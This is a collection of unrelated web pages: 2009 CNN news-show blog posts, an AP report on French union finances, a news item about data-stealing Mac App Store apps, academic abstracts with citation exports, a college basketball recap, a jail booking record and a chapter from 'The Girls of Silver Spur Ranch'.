The group was made up of people from different backgrounds and professions.
What they have in common – they're all unemployed.
They also share strong opinions on what they wanted to hear from the President.
Are you unemployed? What are your opinions on the President's news conference? Comment below.
The stories that will be making news later today:
This afternoon – President Obama makes the pitch for his 3.6 trillion dollar budget to Senate Democrats. Its a tough sell – a lot of top Democrats are worried the new budget could add seven to nine trillion dollars in new debt.
The crew of the Space Shuttle Discovery is preparing to depart the International Space Station. Discovery scheduled to undock from the space station at 3:53 ET this afternoon. It will perform the traditional fly-around of the station before heading home. Discovery will return to Earth on Saturday.
Cycling legend Lance Armstrong is expected to undergo surgery at 7 o'clock CT on his broken collarbone. Armstrong said in a Twitter post last night that the injury was more serious than doctors first thought. He says tests showed multiple pieces of broken bone. Armstrong crashed Monday during a race in Spain. The seven-time Tour de France winner plans to get back on the bike by May.
Filed under: Fast Forward
What’s on Tap – Wednesday March 25, 2009
The Best Political Team is up early, breaking down the president’s big sell in prime time. Some of his biggest supporters and toughest critics will face off, from James Carville to Former Presidential Candidate Fred Thompson.
Plus – a special adviser to the U.N. Secretary General, says President Obama’s new bank bailout plan is bogus.
After a distasteful joke on Leno and some awkward laughter on “60 minutes”, a lot was riding on this appearance. There were tense moments. CNN Contributor Bill Bennett said the president walked into a “murderer’s row” in the White House East Room, but the president was able to stay on message, focusing on the budget and the economy.
We want to know if he answered your questions. Call 877-MYAMFIX with your reaction. We’re also asking a few recently unemployed workers about their sacrifices, and whether President Obama made them feel better about their future. The President said the country is moving in the right direction. Let us know what do you think.
Filed under: What's On Tap
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Community > World > Europe > France > Ile-de-France > Paris
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| ERROR: type should be string, got "https://apnews.com/95b59af6e8c3e0a0d52f6914e0d06c2b\nFrench unions behind strikes get public funds\nBy ELAINE GANLEYDecember 30, 2019 GMT\nFILE - In this Dec. 10, 2019, file photo, protesters march through smoke from flares at a demonstration during a mass strike in Marseille, southern France. Unions represent less than 10% of salaried workers but have a cozy, if paradoxical, relationship with officialdom that empowers them to block change. (AP Photo/Daniel Cole, File)\nPARIS (AP) — As France’s strikes entered their 26th day Monday, some in the country are questioning if the labor unions that are driving the crippling stoppages have outsized power.\nThe strikes have closed French landmarks, hurt small businesses over the Christmas season and hobbled public transportation. So packed was a Paris bus recently that an elderly man with a cane fell out when the doors opened at a stop. Yet the unions’ cozy but paradoxical relationship with officialdom empowers them to block change.\nUnions represent less than 10% of the country’s salaried workers but receive funds from 100% of them. The French state, local governments and employers help fill union coffers, too, in part to buy peace from what the government calls its “social partners.” But peace is elusive as the strikes continue and President Emmanuel Macron remains steadfast in vowing to to raise the retirement age from 62 to 64 and do away with special benefits for some categories of workers.\nFrance’s increasingly put-upon population has yet to rebel — an act that would demolish union cries of public support and weaken their negotiating position.\n“The mobilization is still there. That’s a real message for the government,” CGT leader Philippe Martinez, leader of the hard-left CGT union, said after a Paris march that drew thousands on Saturday.\nPublic support is hard to measure. A Jan. 9 “day of action” protest may serve as a gauge. The strikes already have broken the 1995 record of a 22-day action over pension reform before the government backed down.\nClues might be found in online crowdfunding efforts to help needy strikers. The largest, started by the CGT union’s information and communication branch, tweeted that it had collected more than 1 million euros ($1.1 million) by Dec. 26.\n“I think ... people feel protected by the union organization,” said Olivier Lefebvre, a maintenance worker at a Peugeot automobile plant and top official of the Workers’ Force union at PSA Peugeot. “It’s stable. It’s always there, just in case.”\nHe noted that deals negotiated by unions are “applicable to everyone,” unionized or not.\nFirst legalized in 1884, two decades after Napoleon III accorded workers the right to strike, France’s unions have built up muscle and money over the years.\nLarge unions have a considerable patrimony, including chateaux, some of them requisitioned at the end of World War II, according to Dominique Andolfatto, an expert on unions at the University of Bourgogne Franche-Comte. The chateaux are used in some cases as vacation or training centers.\nBut in recent years unions have been losing members — about a 30% decline since 1970, Andolfatto said. France now has one of the lowest rates of unionized workers in the 36-nation Organization for Economic Cooperation and Development, he said.\nThe loss in membership could mean a loss in funds from union dues, but a new category of public funding came into force in 2015 with a law obliging workers to contribute 0.016% of their paychecks to unions. The small sum adds up and is part of the snug relationship between unions and the state.\nUnions in some cases also benefit from direct subsidies from companies or cities and towns, Andolfatto said. Companies and the state also pay for employees “detached” from their job, some full time, to concentrate on union work, including arranging strike actions, he said, estimating that at least 20,000 civil servants are affected.\nA 2011 parliamentary report on the circuitous finances of labor unions was buried, too taboo to be published.\nOfficially, France “considers ... that unionism is positive for the economy ... It contributes to democracy, to development,” Andolfatto said. The unstated reason is that officials and employers consider they “are buying social peace.”\nFranck Queru, 52, a train driver and representative for the hard-left CGT union at Paris’ Austerlitz train station, pays 1% of his monthly salary in union dues, and he scoffed at talk of retirement privileges or the reportedly hidden riches of the big unions.\nPast presidents have chipped away at France’s retirement system, and salaries have not stayed abreast of the rising cost of living, said Queru, who plans to retire at 54 with 75% of his salary. He is on strike to ensure such benefits remain for his successors at the SNCF train authority.\n“I don’t consider I’m favored,” Queru said. ”I think all salaried workers should have the same conditions that we do.”"
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Malicious applications found to be stealing data in the Mac App Store
|In Mac Pro, MacBook, MacBook Pro, macOS, macOS 10.14, macOS Mojave
|By Chris Grainger
A number of applications in the Mac App Store have found to be violating Apple’s Developer End User License Agreement, by stealing user data from their Mac computers, reports AppleInsider.
One of the apps in question was a top paid utility, available in the Mac App Store before Apple removed it.
Security firm MalwareBytes reports:
The data is dispatched to servers in China, a country that doesn’t require the same stringent storage requirements as the United States or European countries for personal data. In cases like these, it is highly likely the data is being used for malicious purposes.
Apps including Adware Doctor collect user’s Safari search history and sends a list of downloaded software installed on a users’ computer while it “cleans” the computer.
Apple’s processes in the Mac App Store have failed, as these malicious applications found loopholes in the system.
After AppleInsider reported the incident, the malicious Chinese servers were taken offline, so no user data can be sent.
MalwareBytes has made the following comment:
“treat the App Store just like you would any other download location: as potentially dangerous, orse, even if you don’t give it access, it may find a loophole and get access to sensitive data anyway”
Apple has a website for reporting problems about potential malware and spyware on the Mac App Store. Appleosophy recommends staying away from Mac cleaning apps, and allow macOS to work its magic.
This is one sign again, that Apple needs to pay attention to the Mac App Store, but the future macOS Mojave update, coming this fall hopes to change this with an all-new design and iOS ported apps launching late next year.
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CARB Compliant Parts and E.O. Search
Executive Order D-427-20
Northern California Diagnostic Laboratories, Inc.
ARB >
Executive Orders >
D-427-20
Executive order D-427-20 was approved by the California Air Resource Board on February 2, 2015 for emissions compliance and installation on vehicles in New York and California. This executive order approved parts marts manufactured by Northern California Diagnostic Laboratories, Inc. /.
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This Executive Order approved the specified parts on on February 2, 2015.
As of Sunday, January 19th, 2020 this Executive Order has not been overturned or superceeded.
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Nawigacja Nawigacja
Wszystko Ta organizacja
About Arena
Arena transforms your library, archive and museum membership into a whole new experience based on sharing your interests and discoveries.
With Arena you can build and share your own virtual library, meet and stay in touch with other Arena users, rate and review books, movies and music, read articles, and more.
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The Arena screen
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Foreign Languages and Literature Research and Study Opportunities
Thousands of study and academic opportunities in Foreign Languages and Literature are available internationally. Conferences and summer schools in Foreign Languages and Literature are organized regularly in the best academic centers of the world. The majority of universities and many foundations also offer BA, MA and PhD programs in Foreign Languages and Literature as wells as postdoctoral research grants, awards and fellowships. Below you will find the updated list of international opportunities available in Foreign Languages and Literature.
12 Fully-Funded Birkbeck Postgraduate International Research Scholarships in Arts 2017-18, UK
Работа - Преподаватель русского языка, Российско-Армянский университет
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Գերմաներենի ինտենսիվ դասընթացներ Երևանում
Café Writers Open Poetry Competition 2016
TOEFL® Test Preparation - The Insider’s Guide
Vice-Chancellor's Researcher Development Scheme - Nottingham Trent University
JFTC Essay Competition 2016
Summer School - Chechen and Georgian Musical Folklore and Chechen Language, 22-31 August 2016, Pankisi, Georgia
Ernest J. Gaines Award for Literary Excellence 2016
The Moth Short Story Prize 2016
Hidden River Arts Awards 2016, USA
Katherine Anne Porter Prize 2016 in Short Fiction
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Choose disciplines, subscribe and receive information about international academic and professional opportunities, scholarships, summer schools, conferences, grants, fellowships and trainings matching your interests.
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Barry Holloway
DISCLAIMER NOTICE: ALL ARE PRESUMED INNOCENT...
Jail Location
5′ 10″ (1.78m)
Hair: Gray
Inmate number: 342616
Booking number: 0700005832
Booking date: Dec 20, 2007
Release date: Jan 4, 2008
Booking location: Santa Fe County, NM
Recent Charges
Statute description: TRANSPORT ORDER
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Case number: DOC
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Bond amount: $0 #1
Arrest facts in New Mexico
Rios, Richard
Rios, Rigoberto
Selin, Emily
Miller, Edward
Miller, Elaine
Miller, Eldon
Rios, Rodrigo
Holloway, Courtney
Koury, Tia
Rios, Ruth
Miller, Emmett
Mathes, Richard
ACTIVELY MONITORING...
Holloway, Christine - FL
5′ 7″ (1.70m)
Miller, Elroy - TN
Rios, Sondra - IL
~32yo
Cameron, David - IL
Miller, Eugene - KY
238lbs (108kg)
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Corbisez, Donald - FL
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Crown Point Press, San Francisco ›
Print ›
Richard Diebenkorn ›
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The Barbarian (1992)
by Richard Diebenkorn, Crown Point Press, San Francisco, Renée Bott
Flotsam (1991)
Touched Red (1991)
The Barbarian's Garden - Threatened (1992)
High Green Version I (1992)
High Green, Version II (1992)
by Richard Diebenkorn, Renée Bott, Crown Point Press, San Francisco
Double Map of Ireland, illustration for the book Poems of W. B. Yeats (San Francisco: Arion Press, 1990) (1990)
by Richard Diebenkorn, Arion Press, Crown Point Press, San Francisco
Coat I, illustration for the book Poems of W. B. Yeats (San Francisco: Arion Press, 1990) (1990)
Coat II, illustration for the book Poems of W. B. Yeats (San Francisco: Arion Press, 1990) (1990)
Coat V, illustration for the book Poems of W. B. Yeats (San Francisco: Arion Press, 1990) (1990)
Coat IV, illustration for the book Poems of W. B. Yeats (San Francisco: Arion Press, 1990) (1990)
Coat III, illustration for the book Poems of W. B. Yeats (San Francisco: Arion Press, 1990) (1990)
Domino I (1990)
Reading (1990)
Ne Comprends Pas (1990)
Working proof 1 for Y (1986)
by Richard Diebenkorn, Marcia Bartholme, Crown Point Press, San Francisco
X (1986)
Y (1986)
Tulips (1989)
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Thomas Valentine
Home | History | Notable Masons | Thomas Valentine
R.W. Bro. Thomas Valentine, 32o, J.P.
Provincial Deputy Grand Master, Antrim 1885-1897
Painted by Ernest E. Taylor
R.W. Bro. Thomas Valentine, 32o, was Provincial Deputy Grand Master during a period of twelve years, and was greatly beloved for his kindly and friendly disposition. He ruled with a gentle hand ad made an excellent chairman.
His presence at Provincial Grand Lodge was always welcomed by his brethren, and his interest in the working of the Craft was genuine and sincere. He was one of the old merchants of Belfast who helped to make the city famous for its staple industry, which contributed so much to its prosperity.
Back To Notable Masons
Trustees Past and Present
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ASHRAE Headquarters
ASHRAE Region X
ASHRAExCHANGE
Comments/
This home page is maintained by the Hawaii Chapter of the American Society of Heating, Refrigerating and Air-Conditioning Engineers, Inc. P.O. Box 3916, Honolulu HI 96812-3916. ASHRAE chapters may not act for the Society and the information presented here has not had Society review. To learn more about ASHRAE activities on an international level, contact the ASHRAE home page at http://www.ashrae.org
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Genetic structure of chimpanzee populations.
Celine Becquet, Nick Patterson, Anne Stone, Molly Przeworski, David Reich
CLAS-NS: Evolution and Medicine, Center for
CLAS-SS: Bioarchaelogical Research, Center for (CBR)
CLAS-SS: Human Evolution and Social Change, School of (SHESC)
Little is known about the history and population structure of our closest living relatives, the chimpanzees, in part because of an extremely poor fossil record. To address this, we report the largest genetic study of the chimpanzees to date, examining 310 microsatellites in 84 common chimpanzees and bonobos. We infer three common chimpanzee populations, which correspond to the previously defined labels of "western," "central," and "eastern," and find little evidence of gene flow between them. There is tentative evidence for structure within western chimpanzees, but we do not detect distinct additional populations. The data also provide historical insights, demonstrating that the western chimpanzee population diverged first, and that the eastern and central populations are more closely related in time.
https://doi.org/10.1371/journal.pgen.0030066
Pan troglodytes
Genetic Structures
genetic structure
population structure
Pan paniscus
Becquet, C., Patterson, N., Stone, A., Przeworski, M., & Reich, D. (2007). Genetic structure of chimpanzee populations. PLoS Genetics, 3(4). https://doi.org/10.1371/journal.pgen.0030066
Genetic structure of chimpanzee populations. / Becquet, Celine; Patterson, Nick; Stone, Anne; Przeworski, Molly; Reich, David.
In: PLoS Genetics, Vol. 3, No. 4, 20.04.2007.
Becquet, C, Patterson, N, Stone, A, Przeworski, M & Reich, D 2007, 'Genetic structure of chimpanzee populations.', PLoS Genetics, vol. 3, no. 4. https://doi.org/10.1371/journal.pgen.0030066
Becquet C, Patterson N, Stone A, Przeworski M, Reich D. Genetic structure of chimpanzee populations. PLoS Genetics. 2007 Apr 20;3(4). https://doi.org/10.1371/journal.pgen.0030066
Becquet, Celine ; Patterson, Nick ; Stone, Anne ; Przeworski, Molly ; Reich, David. / Genetic structure of chimpanzee populations. In: PLoS Genetics. 2007 ; Vol. 3, No. 4.
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title = "Genetic structure of chimpanzee populations.",
abstract = "Little is known about the history and population structure of our closest living relatives, the chimpanzees, in part because of an extremely poor fossil record. To address this, we report the largest genetic study of the chimpanzees to date, examining 310 microsatellites in 84 common chimpanzees and bonobos. We infer three common chimpanzee populations, which correspond to the previously defined labels of {"}western,{"} {"}central,{"} and {"}eastern,{"} and find little evidence of gene flow between them. There is tentative evidence for structure within western chimpanzees, but we do not detect distinct additional populations. The data also provide historical insights, demonstrating that the western chimpanzee population diverged first, and that the eastern and central populations are more closely related in time.",
author = "Celine Becquet and Nick Patterson and Anne Stone and Molly Przeworski and David Reich",
doi = "10.1371/journal.pgen.0030066",
journal = "PLoS Genetics",
publisher = "Public Library of Science",
T1 - Genetic structure of chimpanzee populations.
AU - Becquet, Celine
AU - Patterson, Nick
AU - Stone, Anne
AU - Przeworski, Molly
AU - Reich, David
N2 - Little is known about the history and population structure of our closest living relatives, the chimpanzees, in part because of an extremely poor fossil record. To address this, we report the largest genetic study of the chimpanzees to date, examining 310 microsatellites in 84 common chimpanzees and bonobos. We infer three common chimpanzee populations, which correspond to the previously defined labels of "western," "central," and "eastern," and find little evidence of gene flow between them. There is tentative evidence for structure within western chimpanzees, but we do not detect distinct additional populations. The data also provide historical insights, demonstrating that the western chimpanzee population diverged first, and that the eastern and central populations are more closely related in time.
AB - Little is known about the history and population structure of our closest living relatives, the chimpanzees, in part because of an extremely poor fossil record. To address this, we report the largest genetic study of the chimpanzees to date, examining 310 microsatellites in 84 common chimpanzees and bonobos. We infer three common chimpanzee populations, which correspond to the previously defined labels of "western," "central," and "eastern," and find little evidence of gene flow between them. There is tentative evidence for structure within western chimpanzees, but we do not detect distinct additional populations. The data also provide historical insights, demonstrating that the western chimpanzee population diverged first, and that the eastern and central populations are more closely related in time.
U2 - 10.1371/journal.pgen.0030066
DO - 10.1371/journal.pgen.0030066
JO - PLoS Genetics
JF - PLoS Genetics
10.1371/journal.pgen.0030066
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The anthropometrical and physiological characteristics of elite water polo players
Yiannis E. Tsekouras, Stavros A. Kavouras, Alessandro Campagna, Yiannis P. Kotsis, Silia S. Syntosi, Kalomira Papazoglou, Labros S. Sidossis
In order to examine the physical and physiological demands of water polo, we assessed the profile of elite water polo players. Nineteen male professional water polo players (age: 25.5±5.0 years, height: 184.5±4.3 cm body mass: 90.7±6.4 kg) underwent body composition assessment by dual-energy X-ray absorptiometry. We also evaluated peak oxygen consumption V̇O2peak lactate threshold (LT), energy cost of swimming (Cs), anaerobic capacity and isokinetic shoulder strength. Body fat (%) was 16.8±4.4, lean mass (LM) 75.1±4.9 kg and bone mineral density (BMD) 1.37±0.07 g·cm-2. V̇O2peak was 57.9±7 ml·kg-1 ·min-1. LT was identified at 3.9±0.7 mmol·l-1 at a swimming velocity (v) of 1.33±0.05 m·s-1 with a heart rate of 154±7 bpm, corresponding to an intensity of 83±9 of V̇O2peak. The average Cs of swimming at the LT was 1.08±0.04 kJ·m-1. Cs at LT was correlated to body mass index (BMI) (r=0.22, P=0.04) and to swimming performance at 400 m (r=0.86, P=0.01) and 4×50 m (r=0.84, P < 0.01). Internal rotator muscles were stronger compared to the external rotators by a 2:1 ratio. This study provides a quantitative representation of both physical and physiological demands of water polo and proposes a comprehensive battery of tests that can be used for assessing the status of a team.
European Journal of Applied Physiology
Costs and Cost Analysis
Oxygen Consumption
Energy cost of swimming
Lactate threshold
Tsekouras, Y. E., Kavouras, S. A., Campagna, A., Kotsis, Y. P., Syntosi, S. S., Papazoglou, K., & Sidossis, L. S. (2005). The anthropometrical and physiological characteristics of elite water polo players. European Journal of Applied Physiology, 95(1), 35-41. https://doi.org/10.1007/s00421-005-1388-2
The anthropometrical and physiological characteristics of elite water polo players. / Tsekouras, Yiannis E.; Kavouras, Stavros A.; Campagna, Alessandro; Kotsis, Yiannis P.; Syntosi, Silia S.; Papazoglou, Kalomira; Sidossis, Labros S.
In: European Journal of Applied Physiology, Vol. 95, No. 1, 01.09.2005, p. 35-41.
Tsekouras, YE, Kavouras, SA, Campagna, A, Kotsis, YP, Syntosi, SS, Papazoglou, K & Sidossis, LS 2005, 'The anthropometrical and physiological characteristics of elite water polo players', European Journal of Applied Physiology, vol. 95, no. 1, pp. 35-41. https://doi.org/10.1007/s00421-005-1388-2
Tsekouras YE, Kavouras SA, Campagna A, Kotsis YP, Syntosi SS, Papazoglou K et al. The anthropometrical and physiological characteristics of elite water polo players. European Journal of Applied Physiology. 2005 Sep 1;95(1):35-41. https://doi.org/10.1007/s00421-005-1388-2
Tsekouras, Yiannis E. ; Kavouras, Stavros A. ; Campagna, Alessandro ; Kotsis, Yiannis P. ; Syntosi, Silia S. ; Papazoglou, Kalomira ; Sidossis, Labros S. / The anthropometrical and physiological characteristics of elite water polo players. In: European Journal of Applied Physiology. 2005 ; Vol. 95, No. 1. pp. 35-41.
@article{0c3108db583e44da98db195e52c7e6e5,
title = "The anthropometrical and physiological characteristics of elite water polo players",
abstract = "In order to examine the physical and physiological demands of water polo, we assessed the profile of elite water polo players. Nineteen male professional water polo players (age: 25.5±5.0 years, height: 184.5±4.3 cm body mass: 90.7±6.4 kg) underwent body composition assessment by dual-energy X-ray absorptiometry. We also evaluated peak oxygen consumption V̇O2peak lactate threshold (LT), energy cost of swimming (Cs), anaerobic capacity and isokinetic shoulder strength. Body fat ({\%}) was 16.8±4.4, lean mass (LM) 75.1±4.9 kg and bone mineral density (BMD) 1.37±0.07 g·cm-2. V̇O2peak was 57.9±7 ml·kg-1 ·min-1. LT was identified at 3.9±0.7 mmol·l-1 at a swimming velocity (v) of 1.33±0.05 m·s-1 with a heart rate of 154±7 bpm, corresponding to an intensity of 83±9 of V̇O2peak. The average Cs of swimming at the LT was 1.08±0.04 kJ·m-1. Cs at LT was correlated to body mass index (BMI) (r=0.22, P=0.04) and to swimming performance at 400 m (r=0.86, P=0.01) and 4×50 m (r=0.84, P < 0.01). Internal rotator muscles were stronger compared to the external rotators by a 2:1 ratio. This study provides a quantitative representation of both physical and physiological demands of water polo and proposes a comprehensive battery of tests that can be used for assessing the status of a team.",
keywords = "Body composition, Energy cost of swimming, Isokinetic, Lactate threshold, Performance",
author = "Tsekouras, {Yiannis E.} and Kavouras, {Stavros A.} and Alessandro Campagna and Kotsis, {Yiannis P.} and Syntosi, {Silia S.} and Kalomira Papazoglou and Sidossis, {Labros S.}",
journal = "European Journal of Applied Physiology",
T1 - The anthropometrical and physiological characteristics of elite water polo players
AU - Tsekouras, Yiannis E.
AU - Kavouras, Stavros A.
AU - Campagna, Alessandro
AU - Kotsis, Yiannis P.
AU - Syntosi, Silia S.
AU - Papazoglou, Kalomira
AU - Sidossis, Labros S.
N2 - In order to examine the physical and physiological demands of water polo, we assessed the profile of elite water polo players. Nineteen male professional water polo players (age: 25.5±5.0 years, height: 184.5±4.3 cm body mass: 90.7±6.4 kg) underwent body composition assessment by dual-energy X-ray absorptiometry. We also evaluated peak oxygen consumption V̇O2peak lactate threshold (LT), energy cost of swimming (Cs), anaerobic capacity and isokinetic shoulder strength. Body fat (%) was 16.8±4.4, lean mass (LM) 75.1±4.9 kg and bone mineral density (BMD) 1.37±0.07 g·cm-2. V̇O2peak was 57.9±7 ml·kg-1 ·min-1. LT was identified at 3.9±0.7 mmol·l-1 at a swimming velocity (v) of 1.33±0.05 m·s-1 with a heart rate of 154±7 bpm, corresponding to an intensity of 83±9 of V̇O2peak. The average Cs of swimming at the LT was 1.08±0.04 kJ·m-1. Cs at LT was correlated to body mass index (BMI) (r=0.22, P=0.04) and to swimming performance at 400 m (r=0.86, P=0.01) and 4×50 m (r=0.84, P < 0.01). Internal rotator muscles were stronger compared to the external rotators by a 2:1 ratio. This study provides a quantitative representation of both physical and physiological demands of water polo and proposes a comprehensive battery of tests that can be used for assessing the status of a team.
AB - In order to examine the physical and physiological demands of water polo, we assessed the profile of elite water polo players. Nineteen male professional water polo players (age: 25.5±5.0 years, height: 184.5±4.3 cm body mass: 90.7±6.4 kg) underwent body composition assessment by dual-energy X-ray absorptiometry. We also evaluated peak oxygen consumption V̇O2peak lactate threshold (LT), energy cost of swimming (Cs), anaerobic capacity and isokinetic shoulder strength. Body fat (%) was 16.8±4.4, lean mass (LM) 75.1±4.9 kg and bone mineral density (BMD) 1.37±0.07 g·cm-2. V̇O2peak was 57.9±7 ml·kg-1 ·min-1. LT was identified at 3.9±0.7 mmol·l-1 at a swimming velocity (v) of 1.33±0.05 m·s-1 with a heart rate of 154±7 bpm, corresponding to an intensity of 83±9 of V̇O2peak. The average Cs of swimming at the LT was 1.08±0.04 kJ·m-1. Cs at LT was correlated to body mass index (BMI) (r=0.22, P=0.04) and to swimming performance at 400 m (r=0.86, P=0.01) and 4×50 m (r=0.84, P < 0.01). Internal rotator muscles were stronger compared to the external rotators by a 2:1 ratio. This study provides a quantitative representation of both physical and physiological demands of water polo and proposes a comprehensive battery of tests that can be used for assessing the status of a team.
KW - Body composition
KW - Energy cost of swimming
KW - Isokinetic
KW - Lactate threshold
KW - Performance
JO - European Journal of Applied Physiology
JF - European Journal of Applied Physiology
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@HOPECOLLEGEWBB
HOPECOLLEGEWBB
@HOPEWBB
Women's Basketball Drops Showdown To Trine
Trine (11-2(4-0)) 17 22 25 9 73
Hope (11-2(3-1)) 16 11 16 18 61
Pts: Brandi Dawson - 21
Ast: Cassidy Williams - 4
Pts: Kenedy Schoonveld - 18
Reb: Ashleigh Thomas - 7
Ast: Lauren Newman - 4
The Hope College women's basketball team clawed back from a slow start, only to see the opposing Trine Thunder strike again.
No. 11-ranked Trine dominated the second and third quarters to take Wednesday's showdown of nationally ranked teams, 73-61, at DeVos Fieldhouse.
No. 5 Hope fell into a second-place tie in the Michigan Intercollegiate Athletic Association standings with a 3-1 record. The Flying Dutch (11-2 overall) join Albion College and Calvin College one game behind Trine (11-2, 4-0 MIAA).
Trine outscored Hope 22-11 during the second quarter and 25-16 during the third quarter.
The Thunder scored the first seven points of the game. Hope rallied to take a 14-13 lead on two free throws from sophomore guard Sydney Muller of Grand Rapids, Michigan (Grand Rapids Christian HS) with 2 minutes, 57 seconds remaining in the opening frame.
A jumper from sophomore forward Olivia Voskuil of Holland, Michigan (Holland Christian HS) two minutes later made the score 17-16 Trine at the end of the first quarter.
"To our credit, I thought we closed it down. At the end of the first quarter, I felt good about where we were at," head coach Brian Morehouse said. "Then I don't know if they missed a shot in the second quarter. They shot 58 percent in the first half, and that's really difficult to recover from."
Trine shot 67 percent from the field (18-27) during the second and third quarters, including 58.3 percent from 3-point range (7-12).
Guard Brandi Dawson topped the Thunder with a game-high 21 points on 64.3 percent shooting (9-14). Six Thunder players finished with at least eight points.
Sophomore guard Kenedy Schoonveld of Zeeland, Michigan (Holland Christian) led Hope with 18 points and six rebounds.
Voskuil scored 10 points. She also grabbed six rebounds.
Hope's next game is Saturday, January 5 at Kalamazoo College. Tipoff is 3 p.m.
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The Girls of Silver Spur Ranch
by Grace MacGowan Cooke
A Jewel of Great Price
Every single member of the Spooner family with the exception of Jonah Bean, who declared he didn't have no time to waste a-pleasurin', were going to Emerald, to spend the day with Cousin Hannah Pratt and take part in the Harvest Home festival.
Cousin Hannah, having heard of the new phaeton, declared that now Mrs. Spooner didn't have an earthly thing to prevent her coming to town, and she had sent such urgent entreaties by Roy, that at last the mistress of the ranch was prevailed upon to accept the invitation.
"But I can only spend the day," she declared, "we can't all be spared at once; Jonah is just able to be about, we mustn't leave him too much work to do. The Babe and I will come back in the afternoon, and the girls can stay--and you, Roy?"
There was a little note of interrogation in her voice as she laid her hand affectionately upon the boy's shoulder. She was almost sure that he wouldn't want to go to a party that his grief was too recent.
Roy patted her hand, smiling a little sadly as he shook his head. "I don't feel equal to parties yet," he said.
"And as to both Ruth and me staying, that's out of the question," decided Elizabeth. "There'll be a hundred and one things to do, and you'll try to do them every one. Ruth's going to stay all night because it's her turn--Mary and I went last year. So that's settled, mother."
After some argument, Ruth--who really did want to stay very much, yielded. If Elizabeth wouldn't stay, why she would, and be glad to.
"And you may carry my fan," said Elizabeth generously, "nobody--not even Maudie, will have such a beautiful one. And you shall wear my pink girdle, too, it's newer than your sash."
The Babe sighed. She was having a mental struggle as to whether she could practise self-denial enough to lend her sister the string of coral beads that were the delight of her heart. The situation finally resulted in a compromise.
"And I'll lend you my beads--after I've wore 'em all day. But you mustn't forget to feel every now and then for the catch, to see if it's fastened," she warned.
"Thank you, Babe, I will," laughed Ruth, "and I'll take good care of your fan, too, Elizabeth. Dear me, won't I be fine! Pink coral, and pink girdle, a Spanish fan and my drawn-work handkerchief!"
"I don't approve of girls borrowing things from each other," said Mrs. Spooner, doubtfully. "I've known serious trouble to result from such practices. There's always danger of losing or injuring the things, you know. But, if you sisters want to lend, I won't object. Only be very careful, because you couldn't replace them if they were lost."
"I'll be careful as care, mother--don't you worry." And Ruth ran happily away, to pack her suit-case and get together her simple finery.
There were various attractions to be at the celebration. A brass band from a big town would play in the public square, between speeches by noted members of the State Grange. Pony-races by cowboys from the neighboring ranches, the inevitable roping match, a big open-air dinner for the public, and, to wind up with a dance at night in the town-hall, where the various exhibits from the farms--the grain, fruits and vegetables--were displayed.
As the Spooners desired to see all these spectacles, they started out bright and early; Mrs. Spooner, the Babe and Ruth's suitcase in the phaeton, the girls and Roy riding their ponies.
Cousin Hannah, whose husband--a mild little man, quite overshadowed by his big, bustling wife--was a rancher without a ranch, spending most of his time taking cattle to the fattening ranges above, or to market in other states, lived in a big, flimsily built frame house in the little prairie town of Emerald. Mrs. Pratt boarded the station-agent, the telegraph operator, the school-teacher, and nearly all of what might be termed the floating population of the town.
Maudie, the Pratt's only child, was a girl about Elizabeth's age, rather pretty and very much spoiled by her mother and her grandmother, who lived in another state, and who often had Maudie come and visit her.
Mr. Pratt, who happened to be at home for the festival, with his wife, came out to meet their guests, welcoming them with much hospitality.
"The sight of you's sure good for sore eyes, Jennie," exclaimed Cousin Hannah, as she folded Mrs. Spooner in her ample embrace. "I'm tickled to death to see you! And ain't that buggy a sight. It looks 'most as good as new, I declare!"
"It's not a buggy, Cousin Hannah--it's a phantom," said the Babe, with dignity.
Almost as good as new, indeed! Where were Cousin Hannah's eyes? Very few phaetons looked so new and delightful, to the Babe's vision, anyway, as this vehicle, in whose loving rejuvenation every one of them had been allowed to have a hand.
"A phantom, is it?" laughed Cousin Hannah. "Well, you come in here to the dining-room and find out whether these cookies are phantoms. The big girls want to go up to Maudie's room, I know. Run along, honies, I'll take care of your ma and the Babe, and Mr. Pratt'll look after Roy. Maudie ain't come out, yet; she's feelin' poorly, and wants to save up her strength for to-night. Maudie's right delicate."
"Come in!" called out Maudie, when Elizabeth and Ruth, with the suit-case between them, rapped at her door.
The young lady sat at her dresser, attired in a much trimmed and flowered kimona, leisurely "doing" her nails with a silver-handled polisher from an elaborate dressing-case spread open before her.
"Hello! If it ain't Elizabeth and Ruth!" she greeted, with somewhat condescending cordiality. "You all come in to see the country jays celebrate? Emerald's such a pokey little hole folks are glad to see most anything, for a change."
"If you think Emerald's dull, Maudie, what would you do out on our ranch?" asked Elizabeth, laughingly.
Maudie shuddered. "Horrors! Don't mention it--such a fate would be too unspeakable!"
"Yet Elizabeth and I manage to stand it--and I reckon we're as happy as most girls," protested Ruth, stoutly.
"O, that's because you don't know any better. You've never enjoyed the advantages of city life, as I have," said Maudie superiorly.
"I suppose your grandmother gave you a heap of pretty things, as usual," said Elizabeth, anxious to change the subject.
"O yes, a good many," carelessly replied Maudie. "How do you like this diamond ring? She gave me this on my birthday."
She held out her hand, which was adorned with several rings, one of them a small but showily set diamond.
Elizabeth and Ruth viewed the jewel with admiring amazement. Neither one of them had ever seen a diamond before, and to their untutored eyes it represented splendor indeed.
"Try it on," said Maudie affably, pleased with their exclamations of delighted wonder. It was much too large for Elizabeth's slender finger, but it fitted Ruth's plumper one pretty well.
Maudie replaced the ring on her own finger, and lifted out the tray of her trunk. "What are you girls going to wear to-night?" she asked carelessly.
"I'm not going to stay, but Ruth will wear her white dress," said Elizabeth. Somehow Ruth felt as if she couldn't speak of her poor little frock among all Maudie's radiant treasures.
"Oh," Maudie's eyebrows lifted slightly. "Let me show you what I'm going to wear." And she unfolded and shook out the shimmering breadths of a pale blue summer silk, lavishly trimmed with lace and ribbon.
"O-o-o!" breathed Ruth, rapturously, "I never saw such a perfectly beautiful dress, Maudie!"
And Elizabeth echoed, warmly, "A beautiful dress--and just the color I'd like, if I ever had a party dress."
"It is rather pretty, I think," acknowledged Maudie, with the air of a person to whom silks are a matter of course. She took out more dresses, dazzling the eyes of her country cousins with the sight of so much magnificence, and making poor Ruth feel very shabby indeed.
"My pink challis or blue mull would fit you exactly, Elizabeth--you're tall as I am. Stay all night and I'll lend you either one of them you want. I'd like to have you stay, too--the girls here are so common."
Elizabeth's cheeks flushed redly. Evidently Cousin Hannah had made no further disclosures. To Maudie, Elizabeth was still her cousin, and a Spooner--the name that had once seemed so commonplace and now so beautiful compared to that of the despised movers.
"O, but really I can't stay, Maudie; it's good of you to want me, and to offer to lend me your beautiful clothes, but mother can't spare us both very well, and Mary and I came last year, you know!"
